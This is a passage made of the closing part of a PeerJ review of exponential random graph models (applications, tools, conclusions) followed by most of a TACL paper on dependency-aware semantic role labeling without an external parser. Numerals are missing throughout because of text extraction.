this could result in lack of diversity of opinions in the final outcomes of the assessments conducted by the research group. wireless networks modelling random geometric graphs also known as rggs are defined as the group of graphs which are obtained by placing a number of nodes randomly in a geometrical space and draw vertices between those nodes which their distance is less than a threshold d in a given norm (penrose et al., ). one issue in the wireless sensor networks is that there is not a fixed placement for the nodes in most of times. the nodes are randomly distributed and therefore the shape of connecting graph tend to be very volatile (raghavendra, sivalingam & znati, ). studying these graphs formation and the statistical dynamic behind their formation has been extensively investigated in the literature related to rggs (iyer & manjunath, ). for example, exponential rggs which are the rggs that the distribution of their nodes is also exponential (gupta, iyer & manjunath, ). these graphs have been used for modeling wireless sensor networks shang ( ) abd kenniche & ravelomananana ( ). in the shang ( ) the wireless sensors are assumed to be on a line and to evolve over time with respect to a dynamic rgg process. the effect of statistical properties for a particular time snapshot has also been considered in this paper. such analysis with using one-dimensional rgg has also been done in the past in karamchandani et al. ( ). vehicular ad hoc network are yet another use case for rggs (zhang et al., ). due to the movement of the vehicles and the rapid changes in the graph they have many similarities to previous applications of rggs. other applications the applications of ergms are so extensive that some works cannot be organized in a particular category. in this section, we introduce some of them. the concept of social networks is not limited only to human relationships. there are some complex interactions in animal behaviors which can be modeled as graphs. ergms are also a useful tool for analyzing these kinds of networks. in a recent work, (silk & fisher, ) reviewed the use of ergms in such studies. also, more specifically, other recent ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. works have leveraged ergms capabilities in their specific context. hellmann & hamilton ( ) is a work in which the authors investigated the effect of neighbors’ mediation in cooperative fish breeding by analyzing their interactions with an ergm model. in another work (silk et al., ), the same approach was used to investigate sex-related disease spreading through animal contact networks in three sorts of animal networks. in a novel work, müller, grund & koskinen ( ) studied the social inequalities in sweden by analyzing an immigrant movement flow network on both the micro and macro levels. their network was a directed binary graph with stockholm’s neighborhoods as the nodes and ties as the representative of the movement flow across neighborhoods. only structural features (statistics) were used in ergms. how do networks respond to a sudden change? which sort of disruptions is most influential in the network upcoming status? how the network will react to a change or what is the best reaction? these are all questions that can be summarized as ‘‘forecasting social network reaction to disruption.’’ in a recent article, mellon & evans ( ) reviewed state-of-the-art research articles concerning these topics in various fields. 
according to them and by mentioning one of their previous works (mellon, yoder & evans, ), ergms can play a crucial role in this issue. in the mentioned work, they used ergms to examine the network formation mechanism before and after the intervention. according to their findings, networks tend to preserve these mechanisms following the disruptions. tools and libraries there are a number of useful tools and libraries that facilitate use of ergms in different domains. pnet and its extension for multilevel networks (mpnet) and bivariate analysis (xpnet) were introduced by wang, robins & pattison ( ). it is a stand-alone software, it has both windows .net and java versions. because of the java version, it can be considered as a cross-platform application. also, since it is not a library of some other languages and thanks to its user-friendly environment, it is the most suitable choice for people with less computer programming background. it is also a free software application and can easily be downloaded through its website (http://www.melnet.org.au/pnet/). statnet (handcock et al., ; handcock et al., ) is an r language package which can implement most state-of-the-art ergm methods and algorithms. it also has a variety of capabilities via other r libraries. for example, some visualization options are available through libraries such as dynamic network and rsonia. a wide range of network configurations has been implemented in this package. it has an active community, and it seems that it is the de facto standard library for ergms. thanks to its open source and well- documented codebase, it can be used as a template for implementation of new methods. however, because it is a programming language library and not standalone software, it requires minimum knowledge of programming. goodreau et al. ( ) have presented a detailed explanation for its installation and usage. there are also other extensions for the statnet; for example, caimo & friel ( ) has incorporated the bayesian ergms into the library. ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.melnet.org.au/pnet/ http://dx.doi.org/ . /peerj-cs. conclusions this study offered an explanation of exponential random graph models aka ergms. we also reviewed some state-of-the-art methods published after . these articles either presented new methods for fitting the ergms parameters or studied the possibility of using new network configurations. further, we did a comprehensive study of the research articles published by scientists of multiple disciplines which have leveraged the applications of ergms in their fields of interest. multiple variation of the ergm networks have been reviewed. we classified research articles in seven plus one (other applications) categories. these included research works in medical imaging, healthcare applications, economics and management, political science, missing data and link prediction, scientific collaboration, wireless networks modelling, and other applications. altogether, these studies provided valuable insight into the potential use of ergms in interdisciplinary research. we also presented a brief description of the ergms tools and libraries which can be used by scientists to conduct research like the research papers we presented. the objective of this study was to develop an understanding of the ergms methods and applications for those with limited knowledge about them. 
however, more in depth study for applications of ergms in each special area of study is still needed. these domain specific studies can do further analysis on the technical side of the ergm modelling which was not a concern of our work. some potential future directions for future research are: • there are many good papers investigated the applications of exponential random graphs from social science research community. however, there is a lack of interest among engineering community in these methods. investigating the possibilities of using ergms in networked data in various field of engineering studies is a research path should be considered in the future. some examples are studies on computer network topology, internet measurement which this statistical tool might be used for prediction of missing links or for the purpose of data, etc. • multilayer networks are now widely studied in different disciplines e.g., transport and economical networks. despite some good works using state of the art ergms methods for multi-layer networks there is still a lack of interest in using statistical tools like ergms for them comparing to other methods. • the hype of deep learning (lecun, bengio & hinton, ) has made many new possibilists for combining them with traditional methods to achieve better estimation. to the best of our knowledge no work has been done to this date trying to leverage graph based deep learning methods alongside ergms. • despite the existence of comprehensive libraries for ergms like statnet, there is still no library for it written in python. since python is the most used programming language in data science it is worthwhile to implement a powerful library for ergms modelling in python. one possible way is to extend current widely used libraries like networkx (hagberg, swart & chult, ) to include ergms in them. • to the best of our knowledge there is no comprehensive research on comparison of ergms with newly presented generative graph models like netgan (bojchevski et al., ). ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • saeid ghafouri conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. • seyed hossein khasteh analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: our paper is a review paper and there is no code or raw data associated with it. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references amati v, lomi a, mira a. . social network modeling. annual review of statistics and its application : – doi . /annurev-statistics- - . an w, ding y. . the landscape of causal inference: perspective from citation network analysis. the american statistician : – doi . / . . . anderson cj, wasserman s, crouch b. . a p* primer: logit models for social networks. social networks : – doi . /s - ( ) - . baggio s, luisier v, vladescu c. . relationships between social networks and mental health: an exponential random graph model approach among romanian adolescents. swiss journal of psychology ( ): . 
syntax-aware semantic role labeling without parsing

rui cai and mirella lapata
institute for language, cognition and computation, school of informatics, university of edinburgh
rui.cai@ed.ac.uk, mlap@inf.ed.ac.uk

abstract

in this paper we focus on learning dependency-aware representations for semantic role labeling without recourse to an external parser. the backbone of our model is an lstm-based semantic role labeler jointly trained with two auxiliary tasks: predicting the dependency label of a word and whether there exists an arc linking it to the predicate. the auxiliary tasks provide syntactic information that is specific to semantic role labeling and are learned from training data (dependency annotations) without relying on existing dependency parsers, which can be noisy (e.g., on out-of-domain data or infrequent constructions). experimental results on the conll-2009 benchmark dataset show that our model outperforms the state of the art in english, and consistently improves performance in other languages, including chinese, german, and spanish.

introduction

semantic role labeling (srl) aims to identify the arguments of semantic predicates in a sentence and label them with a set of predefined relations (e.g., "who" did "what" to "whom," "when," and "where").
semantic roles capture basic predicate-argument structure while abstract- ing over surface syntactic configurations and have been shown to benefit a wide spectrum of applications ranging from machine translation (aziz et al., ; marcheggiani et al., ) to information extraction (christensen et al., ) and summarization (khan et al., ). the successful application of neural networks to a variety of nlp tasks (bahdanau et al., ; vinyals et al., ) has provided strong impetus to develop deep end-to-end models for srl that forego the need for extensive feature engineering. recently proposed models (zhou and xu, ; he et al., ; marcheggiani et al., ) largely rely on bi-directional recurrent neural networks (hochreiter and schmidhuber, ) and predict semantic roles from textual input. they achieve competitive results while being syntax agnostic, thereby challenging conventional wisdom that parse trees provide a better form of representation for assigning semantic role labels (johansson and nugues, ). there are, however, good reasons why syntax ought to help semantic role labeling. first and foremost, srl systems are trained on datasets whose semantic role annotations have been pro- duced on top of treebanked corpora, and as a re- sult are closely tied to syntactic information. an example sentence with roles labeled in the style of propbank (palmer et al., ) is shown in figure . here, many arcs in the syntactic depen- dency graph are mirrored in the semantic dependency graph, suggesting that syntactic dependencies could provide useful information to the srl task. secondly, predicates are typically associated with a standard linking, that is, a deterministic mapping from syntactic roles to semantic ones (lang and lapata, ; surdeanu et al., ). for example, subject (sbj) is commonly mapped onto a , whereas a is often realized as object (obj). even in cases where there is no canoni- cal mapping, dependency labels are still closely related to certain semantic roles, like the syntactic function tmp and the semantic role am-tmp. the question of how to effectively incorporate syntactic information into sequential neural net- work models has met with different answers in the literature. marcheggiani and titov ( ) make use of graph convolutional networks (gcns; duvenaud et al., ; kearnes et al., ; kipf and welling, ) as a means to represent syn- tax in neural models. gcns are used to encode syntactic dependency trees in combination with encoders based on long short-term memory units transactions of the association for computational linguistics, vol. , pp. – , . action editor: alessandro moschitti. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : example sentence from the conll- english dataset annotated with syntactic dependencies (bottom) and semantic roles (top). (lstms). he et al. ( ) emphasize the role of syntax in argument identification rather than role labeling. specifically, they develop an argument pruning algorithm that operates over dependency structures and selects argument candidates subject to a parameter determining their distance from the predicate. the predicate and its arguments are then encoded with an lstm similar to marcheggiani and titov ( ). he et al. 
( ) incorporate syntax at decoding time, in the form of constraints on the output structure (e.g., consistency with a parse tree is enforced by rejecting or penalizing arguments that are not constituents), whereas strubell et al. ( ) incorporate syntactic infor- mation in a multi-task neural network model that simultaneously performs part-of-speech tagging, dependency parsing, predicate detection, and srl. in this paper we argue that syntactic information is important for semantic role labeling and syn- tactic parsing is not. despite recent advances in dependency parsing (dozat and manning, ; kiperwasser and goldberg, ), the use of an external parser often leads to pipeline-style architectures where errors propagate to later processing stages, affecting model performance. to mitigate such errors, marcheggiani and titov ( ) calculate a scalar gate for each edge in the dependency tree. and perhaps unsurprisingly, the performance of their system decreases when more than one gcn layer is stacked, as the effect of noisy information is amplified. our key insight is to focus on dependency labels, which provide important information for semantic roles without requiring access to a full-blown syntactic representation of the sentence. our model concentrates on the dependency structures pertaining to the predicate in a given sentence rather than capturing information relating to every arc in the dependency tree. the majority of arguments (approximately %) in the conll- english development set are directly linked to the predicate or are predicates themselves. our work focuses on learning dependency- aware representations without recourse to an ex- ternal parser. the backbone of our model is a semantic role labeler jointly trained with a de- pendency information extractor with two aux- iliary tasks: predicting the dependency label of a word and whether there exists an arc linking it to the predicate. the two auxiliary tasks pro- vide dependency information that is specific to the srl task and is learned from training data (dependency annotations) without ever utilizing an external parser. our model falls under the gen- eral paradigm of multi-task learning (caruana, ) which aims to improve a main task by jointly learning one or more related auxiliary tasks. multi-task learning has been successfully applied to various sequence-prediction tasks including chunking, tagging (collobert et al., b; bjerva et al., ; plank, ; søgaard and goldberg, ; hashimoto et al., ), name error detec- tion (cheng et al., ), machine translation (luong et al., ), supersense tagging (bingel and søgaard, ), entailment (hashimoto et al., ), and semantic role labeling (collobert et al., b; strubell et al., ). experimental results on the conll- benchmark dataset show that our model is able to outperform the state of the art in english, and to improve srl performance in other languages, including chinese, german, and spanish. model description most supervised semantic role labeling systems adopt an architecture consisting of the following steps: (a) predicate identification and disambigua- tion (e.g., crowds in figure is a predicate with sense crowd. ); (b) argument identification (e.g., the arguments of the predicate crowds in figure are he and plate); and (c) argument classification (e.g., the semantic roles for he and plate are a and a , respectively). 
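as a concrete illustration of these three stages, the sketch below (python; the sense identifier and field names are hypothetical rather than taken from the paper) shows the kind of intermediate output each step produces for the example sentence, with roles following the standard propbank a0/a1 convention.

# illustrative only: intermediate outputs of the three-stage pipeline for the
# example sentence "he crowds the plate". the sense id "crowd.01" is a
# hypothetical placeholder; the exact sense number is not given above.
example = {
    "tokens": ["he", "crowds", "the", "plate"],
    # (a) predicate identification and disambiguation (handled by an external model)
    "predicate": {"index": 1, "sense": "crowd.01"},
    # (b) argument identification: tokens that are arguments of the predicate
    "argument_indices": [0, 3],
    # (c) argument classification: a semantic role for each identified argument
    "roles": {0: "A0", 3: "A1"},
}

print(example["roles"])  # {0: 'A0', 3: 'A1'}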
in this paper we focus solely on identifying arguments and labeling them with semantic roles using an off- the-shelf disambiguation model for the first step (björkelund et al., ; roth and lapata, ). our semantic role labeler is built on top of the syntax-agnostic model of marcheggiani et al. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april ( ), which achieves good performance on the conll- english dataset without making use of a parser. figure provides a schematic overview of our model, which has two main components, namely, a dependency information extractor, and a semantic role predictor. the aim of the dependency extractor is to learn syntactic information for each word which subsequently serves as input (combined with word representa- tions) to the semantic role labeler. the dependency extractor consists of: • a word representation component (which boils down to a simple embedding look-up); • a k-layer bidirectional lstm (bilstm) encoder that takes as input the repre- sentation of each word in a sentence and produces context-dependent embeddings; • two multilayer perceptron (mlp) networks that predict the dependency label and type of arc between a word and a predicate. the semantic role predictor consists of: • a word representation component that en- capsulates predicate-specific dependency information; • a j-layer bilstm encoder that takes as input the representation of each word in a sentence; • a classifier that takes as input the bilstm representations of predicates and their arguments and assigns semantic roles to the latter. in the following sections we describe these two components more formally. . dependency information extractor the dependency information extractor (bottom block in figure ) operates on sentences after predicate identification (and disambiguation) has taken place. it learns important syntactic information (i.e., the dependency relation between a predicate and its candidate arguments), which is subsequently used by the semantic role labeler. in the description below we assume that predicates are known. sentence encoder we represent words as the concatenation of three vectors: a randomly initial- ized word embedding x′re ∈ rdw , a pre-trained word embedding x′pe ∈ rdw estimated on an exter- nal text collection, and a character embedding xcei learned by convolutional neural network (cnn) with bidirectional lstm (bilstm). the final word representation is given by x = x′re◦x′pe◦x′ce, where ◦ represents the concatenation operator. following marcheggiani et al. ( ), sen- tences are represented using a bi-directional re- current neural network with lstms (hochreiter and schmidhuber, ). a bidirectional lstm receives at time step t a representation x for each word and recursively computes two hidden states, one for the forward pass ( −→ ht ), and another one for the backward pass ( ←− ht ). each word is the concatenation of its forward and backward lstm state vectors ht = −→ ht ◦ ←− ht . dependency label prediction our model focuses on predicting the dependency labels of predicates as opposed to all words in a dependency tree. 
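before turning to the label classifier, the sentence encoder described above can be sketched as a minimal pytorch module; the dimensions, the layer depth, and the linear stand-in for the character-level cnn-bilstm are assumptions for illustration, not the authors' released code.

import torch
import torch.nn as nn

class SentenceEncoder(nn.Module):
    """minimal sketch of the bilstm sentence encoder: each word is the concatenation
    of a randomly initialised embedding (x_re), a pre-trained embedding (x_pe), and a
    character-level representation (x_ce); the encoder returns h_t = [forward_t ; backward_t]."""

    def __init__(self, vocab_size, pretrained, d_char=100, d_hidden=512, layers=2):
        super().__init__()
        d_word = pretrained.size(1)
        self.rand_emb = nn.Embedding(vocab_size, d_word)                        # x_re
        self.pre_emb = nn.Embedding.from_pretrained(pretrained, freeze=False)   # x_pe
        # stand-in for the cnn-bilstm character encoder used in the paper
        self.char_proj = nn.Linear(d_char, d_char)
        self.bilstm = nn.LSTM(2 * d_word + d_char, d_hidden, num_layers=layers,
                              bidirectional=True, batch_first=True)

    def forward(self, word_ids, char_repr):
        # x = x_re (+) x_pe (+) x_ce, concatenated along the feature dimension
        x = torch.cat([self.rand_emb(word_ids),
                       self.pre_emb(word_ids),
                       self.char_proj(char_repr)], dim=-1)
        h, _ = self.bilstm(x)   # h_t concatenates the forward and backward states
        return h                # shape: (batch, seq_len, 2 * d_hidden)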
for each arc (w, p) consisting of predicate p and modifier w, our model assigns the dependency label l with the highest score according to a multilayer perceptron (mlp): label(w, p) = arg max l∈labels mlplbl(hw ◦hp)[l] ( ) where l are pre-defined dependency labels (e.g., subj, obj), and hw and hp are the hidden states of the bidirectional sentence encoder repre- senting word w and predicate p, respectively (see the bottom bilstm in figure ). the inner structure of the mlp is shown in figure . dependency label scores for arc (w, p) are calculated as follows: mlplbl = wlbl tanh(wwhw + wphp) ( ) where ww, wp, and wlbl are parameter matrices. in our experiments we use a two-layered bilstm encoder following kiperwasser and goldberg ( ), who show that placing a dependency classifier on top of two bilstm layers achieves best results for labeled dependency parsing. link type prediction our aim is to capture how semantic predicates are linked to adjacent words in a sentence. specifically, we are interested in predicting whether they are linked, and, if they are, what type of link they have. again, we only downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : model overview: dependency information extractor (bottom) and a semantic role labeler (top). colored lines are syntax-aware representations for the word he and are shared between the two components. figure : dependency label prediction. blue lines denote dependency arcs between words in the sentence and the predicate crowds. focus on syntactic arcs pertaining to the semantic predicate, rather than all arcs in the dependency tree, and assign each word a label representing its link type in relation to the predicate. tag n indicates there is no arc between a word and the figure : predicting the link type of each word in a sentence. blue lines denote dependency arcs between words in the sentence and the predicate crowds. predicate, whereas tags c and p represent child and parent nodes of the predicate, respectively. figure shows an example of how these labels are processed by our model. we extract predicate linking information from dependency downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april tree annotations, and use a mlp predictor to identify link type information for word wt : mlplnk = wlnk tanh(wlht) ( ) a key difference between the dependency label classifier and the link type predictor is that the latter does not explicitly use hp, namely, predicate- specific information. by doing this, we force the model to learn the linking between long-distance word pair. for a sentence with more than one predicates, the dependency information extractor will produce different results for each predicate. . syntax-aware semantic role labeler our semantic role labeler (upper block in figure ) estimates the probability of role r given the hidden states of candidate argument word i and predicate word p: p(r|ti, tp, l) ∝ exp(wl,r(ti ◦ tp)), ( ) where ti and tp are representations for word i and predicate p, respectively, and l is the lemma of predicate p; symbol◦denotes concatenation and∝ signifies proportionality. following marcheggiani and titov ( ), matrix wl,r is the joint embed- ding of role r and the predicate lemma l using a non-linear transformation: wl,r = relu(u(el ◦ er)) ( ) where u is a parameter matrix, and el ∈ rd ′ l and er ∈ rdr are randomly initialized embeddings of predicate lemmas and roles. 
this way, each role prediction is predicate-specific, and a good representation for roles associated with infrequent predicates can be learned. the model’s training objectivel is the weighted sum of objectives for the srl task and the two auxiliary tasks. formally, l = lsrl + α(llbl + llnk), ( ) where lsrl, llbl, and llnk are the categor- ical cross-entropy of srl, dependency label prediction, and link type prediction, respectively. α is a scalar weight for the auxiliary tasks whose value is tuned experimentally on the development dataset. we will next discuss how the hidden states ti and tp are obtained taking into account the the dependency extractor introduced earlier. input layer representations given a sentence with words (w , . . . , wn), we form a syntax- agnostic word representation x for each word using randomly initialized word embedding xre ∈ rdw , pre-trained word embedding xpe ∈ rdw estimated on an external text collection, randomly initialized part-of-speech tag embedding xpos ∈ rdpos , and randomly initialized lemma embedding xle ∈ rdl (active only if the word is a predicate). the word representation is thus given by x = xre ◦ xpe ◦ xpos ◦ xle, where ◦ represents the concatenation operator. the parameters of the pre-trained word embed- dings xpe are shared with the word embeddings x ′ pe used for our dependency information extrac- tor, and are updated during training. in order to obtain more syntax-aware representations, we utilize hidden-layer representations vhidden and dependency embeddings (elabel and elink). the final representation r, which serves as input to the srl, is the concatenation of three syntactically informed representations: r = x◦vhidden ◦elabel ◦elink ( ) hidden-layer representations in order to com- pute vhidden, we draw inspiration from elmo (peters et al., ), a recently proposed model for generating word representations based on bidirectional lstms trained with a coupled lan- guage model objective. unlike more traditional word embeddings (mikolov et al., ), elmo representations are deep, essentially a linear com- bination of the representations learned at all layers of the lstm instead of just the final layer. we also utilize the combination of the inter- mediate layer representations in the dependency information extractor. given sentence (w , . . . , wn), a bilstm encoder with l layers com- putes for each word a set of l representations: s = {�hj, ←− h j|j = , . . . , l} = {hj|j = , . . . , l} ( ) where hj = [�hj; ←− h j] for each hidden layer in the bilstm encoder. in order to make use of all layers in s for our srl task, we collapse them into a single vector. although we could simply concatenate these representations or select the top layer, we compute downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april vector vhidden as a weighting of the bilstm layers, followed by a non-linear projection: vhidden = relu(whidden(γ j=l∑ j= βjhj)) ( ) where β are softmax-normalized weights for hj , and the scalar parameter γ is of practical importance for optimization, as it allows the model to scale the weighted hidden-layer representations (peters et al., ); both β and γ are updated during training. dependency embeddings an obvious way to take advantage of the dependency label predictions (see section . ) would be to use the embedding el of the label l with the highest score. however, this would place too much emphasis on high confidence labels, which can be noisy. 
instead, we use the weighted composition of all dependency label embeddings elabel, which is calculated as: elabel = ∑ l∈labels softmax(mlplbl)[l]∗el ( ) where the weight of each label embedding is the normalized probability given by the label classifier. analogously, we represent dependency link information elink as: elink = ∑ l∈{n,c,p} softmax(mlplnk)[l]∗el ( ) experiments we implemented our model in pytorch and evaluated it on the english, chinese, german, and spanish conll- benchmark datasets following the standard training, testing, and development set splits. the datasets contain gold- standard dependency annotations, and also gold lemmas, part-of-speech tags, and morphological features. data for the different languages was generated by merging various language specific treebanks such as the penn treebank (parcus et al., ) and brown corpus (francis and kucera, ) for english, the prague dependency treebank for czech (hajičová et al., ), the chinese treebank (xue et al., ), and proposition bank (xue and palmer, ) for chinese, and so on (we refer the interested reader our code is available at https://github.com/ ruicainlp/srl_dep. hyperparameter value dw (english word embeddings) dw (other languages word embeddings) dc (character embeddings) dpos (pos embeddings) dl (lemma embeddings) dh (lstm hidden states) dhidden (hidden layer representation) doutput (output label embeddings) dr (role representation) d ′ l (output lemma representation) k (bilstm depth) j (bilstm depth) batch size input layer dropout rate . hidden layer dropout rate . learning rate . auxiliary tasks loss weight α . table : hyperparameter values. to hajic et al. [ ] for details on individual languages and their annotations). for experiments on english, we used the embeddings of dyer et al. ( ), which were learned using the structured skip n-gram approach of ling et al. ( ). in a few experiments we also used english character embeddings following he et al. ( ). these were pre-trained with a cnn-bilstm model (peters et al., ) on the billion word benchmark, which is publicly released as part of the allennlp toolkit. embeddings for chinese, spanish, and german were pre-trained on wikipedia using fasttext (bojanowski et al., ). the dropout mechanism was applied to the input layer and the top hidden layer of the bilstm encoders. we used the adam optimizer (kingma and ba, ) to train our models. we performed hyperparameter tuning and model selection on the english development set; optimal hyperparameter values (for all languages) are shown in table . the bilstm for the dependency extractor had two layers, and the bilstm for the semantic role labeler had four. predicted pos tags were provided by the conll- shared-task organizers. for all lan- guage, we used the same predicate disambiguator http://www.statmt.org/lm-benchmark/ https://allennlp.org/elmo publicly available at https://github.com/ facebookresearch/fasttext downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/ruicainlp/srl_dep https://github.com/ruicainlp/srl_dep http://www.statmt.org/lm-benchmark/ https://allennlp.org/elmo https://github.com/facebookresearch/fasttext https://github.com/facebookresearch/fasttext single models (with external parser) p r f björkelund et al. ( ) . . . lei et al. ( ) - - . fitzgerald et al. ( ) - - . roth and lapata ( ) . . . marcheggiani and titov ( ) . . . he et al. ( ) . . . single models (w/o external parser) p r f marcheggiani et al. ( ) . . . he et al. 
( ) . . . ours (w/o elmo) . . . ours (with elmo) . . . ensemble models p r f fitzgerald et al. ( ) - - . roth and lapata ( ) . . . marcheggiani and titov ( ) . . . table : english results on the conll- in-domain (wsj) test set. as in roth and lapata ( ) which uses a pipeline of mate-tools (björkelund et al., ). . results our results on the english (in-domain) test set are summarized in table . we compared our system against previous models that use a dependency parser (first block in the table) and those that do not (second block). we also report the results of various ensemble srl models (third block). for a fair comparison with he et al. ( ), we present a variant of our model with character- based elmo embeddings. most comparisons involve neural systems that are based on bilstms (marcheggiani et al., ; marcheggiani and titov, ; he et al., ) or use neural networks for learning slr-specific embeddings (fitzgerald et al., ; roth and lapata, ). we also report the results of two strong symbolic models based on tensor factorization (lei et al., ) and a pipeline of modules that carry out the tokenization, lemmatization, part-of-speech tagging, dependency parsing, and semantic role labeling (björkelund et al., ). as can be seen in table , our model outper- forms previous single and ensemble models, irre- spective of whether they make use of a dependency parser or not. when taking into account elmo embeddings, our model achieves . % f , which single models (with external parser) p r f björkelund et al. ( ) . . . lei et al. ( ) - - . fitzgerald et al. ( ) - - . roth and lapata ( ) . . . marcheggiani and titov ( ) . . . he et al. ( ) . . . single models (w/o external parser) p r f marcheggiani et al. ( ) . . . he et al. ( ) . . . ours (w/o elmo) . . . ours (with elmo) . . . ensemble models p r f fitzgerald et al. ( ) - - . roth and lapata ( ) . . . marcheggiani and titov ( ) . . . table : english results on the conll- out-of domain (brown) test set. is an absolute improvement of . percentage point over the state of the art (he et al., ). it is also interesting to note that the performance of he et al. ( ) drops from . % to . % when a depen- dency parser is not available, whereas our model is able to extract dependency information on its own, without relying on external syntactic parsers. results on the out-of-domain english test set are presented in table . we include comparisons with the same models as in the in-domain case. again, our syntax-light model outperforms previ- ously published single and ensemble models, even when elmo character embeddings are not taken into account (f increases from . % to . % with elmo). it is perhaps not surprising that our model outperforms by a wide margin semantic role labelers that rely heavily on syntactic parsers (roth and lapata, ; marcheggiani and titov, ). their performance degrades considerably on out-of-domain data and the syntactic trees they produce are noisy, compromising the accuracy of the srl systems that rely on them. our model only makes use of features extracted from hidden layers and the weighted sum of output embed- dings, rather than the output of any parser, and as a result is less brittle in this setting. in table we report results from additional experiments on chinese, german, and spanish. although we have not performed detailed downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april chinese p r f björkelund et al. ( ) . . . roth and lapata ( ) . . . marcheggiani and titov ( ) . . . 
he et al. ( ) . . . ours . . . german p r f björkelund et al. ( ) . . . roth and lapata ( ) . . . ours . . . spanish p r f björkelund et al. ( ) . . . roth and lapata ( ) . . . marcheggiani et al. ( ) . . . ours . . . table : results on the conll- test sets for chinese, german, and spanish. parameter selection in these languages (i.e., we used the same parameters as in english), our model achieves state-of-the-art performance across lan- guages. note that elmo character embeddings are not available in chinese and as a result differ- ences in performance between our model and he et al. ( ) are more noticeable compared with english (our system outperforms theirs by . percentage point f ). for german and spanish, our model also achieves the best overall f -scores of . % and . %, respectively. . ablation studies and analysis in order to evaluate the contribution of various model components, we performed a series of ablation studies on the english development set without predicate disambiguation. we performed ablation studies without elmo embeddings, as they could introduce external syntactic and semantic information, potentially obscuring any conclusions about the behavior of our own model. our ablation experiments are summarized in table . the first block shows the performance of the full model. in the second block, we focus on the effect of different kinds of syntactic represen- tations. first, we examined whether it is advan- tageous to share word embeddings between the semantic role labeler and the dependency extrac- tor. we observed that a version of the model that updates pre-trained word embeddings separately performs slightly worse. second, we observe a . % drop in f when not using the representations system p r f ours . . . w/o sharing word embeddings . . . w/o hidden-layer representation . . . w/o output embeddings . . . w/o multi-task learning . . . with full parser . . . w/o joint training . . . table : ablation results on the conll- english development set. of the hidden states in the dependency extractor. the result indicates that features captured by hid- den layers for the dependency prediction task are also helpful in semantic role labeling. third, we see that not directly using the results of the depen- dency extractor slightly hurts srl performance (we observe a . percentage point drop in f ). this is not surprising as the semantic role labeler and dependency information extractor are trained simultaneously. at the beginning of the training process the performance of the extractor is low, so the semantic role labeler gradually learns how to utilize noisy label embeddings, instead of rely- ing on the accuracy of extractor. this makes our model more robust in situations where the depen- dency extractor cannot achieve high performance, and also explains why our model performs better on the out-of-domain test set compared with other systems relying on parsers. in the third block of table , we first verify whether multi-task learning is critical to our srl task by removing the term (llbl + llnk) from the training objective (see equation ( )) and observe a . percentage point drop in f . in figure we compare the full model with multi- task learning against a model trained only for semantic role labeling (srl only) in more detail. we group the semantic roles assigned by the two models (our full model vs. srl only) by their dependency labels. as can be seen, the full model outperforms srl-only on most dependency labels except oprd and tmp, which account only for % of semantic roles. 
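for reference, the joint objective whose auxiliary term (l_lbl + l_lnk) is removed in this ablation corresponds to the short sketch below; it is an illustration in pytorch, and the value chosen for alpha is a placeholder, since the paper tunes the auxiliary-task weight on the development set.

import torch.nn.functional as F

def multitask_loss(srl_logits, srl_gold, lbl_logits, lbl_gold,
                   lnk_logits, lnk_gold, alpha=0.5):
    """sketch of the joint objective l = l_srl + alpha * (l_lbl + l_lnk);
    each term is a categorical cross-entropy over the corresponding labels."""
    l_srl = F.cross_entropy(srl_logits, srl_gold)   # semantic role prediction
    l_lbl = F.cross_entropy(lbl_logits, lbl_gold)   # dependency label prediction
    l_lnk = F.cross_entropy(lnk_logits, lnk_gold)   # link type prediction (n / c / p)
    return l_srl + alpha * (l_lbl + l_lnk)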
we observe noticeable gains for semantic roles with dependency labels nmod, obj, sbj, and adv, which appear relatively frequently in the development set. in table , we present model performance for verbal and nominal predicates, and again compare the results of the full downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : semantic role labeling performance on the english conll- development set; roles are grouped into corresponding dependency relations whose proportional frequencies shown in parentheses (x-axis). verbal ours srl only frequency(%) a . . % a . . % a . . % am-* . . % all . . % nominal ours srl only frequency(%) a . . % a . . % a . . % am-* . . % all . . % table : f results on the english test set broken down into verbal and nominal predicates. model against an srl only model. both models are worse at predicting the semantic roles of nominal predicates (compared with verbal ones). however, our model is generally more accurate, especially for nominal predicates, bringing an overall improvement of . percentage point in f . we next substituted the dependency extractor with a full parser, specifically, the graph-based neural model of kiperwasser and goldberg ( ). the parser, enhanced model achieves a performance of . % in f , which is quite close to the model relying on the dependency extractor (see row ‘‘with full parser’’ in table ). this indicates that we are able to capture most of the information contained in a syntactic parser without any overhead incurred by full-blown parsing. we observed that using a full parser leads to a . per- centage point f increase in recall, but at the expense of precision which drops by . percent- age point. as shown in figure , approximately % of the arguments in the english development set are not directly linked to the predicate (see no arc bar). long-range dependencies often pose problems for srl models; in fact, special net- works like gcn (marcheggiani and titov, ) and pathlstm (roth and lapata, ) have been proposed to explicitly percolate information from each word in the sentence to its syntactic neighbors. however, pathlstm performs worse than a vanilla bilstm model in the case of long- distance arguments, and the performance of an srl model augmented with gcn also decreases when more than one gcn layer is stacked. one of the disadvantages of using an external parser are errors that then propagate through paths in the tree. in our model, a word’s dependency information solely relates to the predicate under consider- ation, which renders the semantic role labeler aware of the overall dependency structure of the input sentence without, however, propagating errors to other words. although the dependency information extractor is trained to recognize arcs pertaining to the predicate, its hidden layers still capture 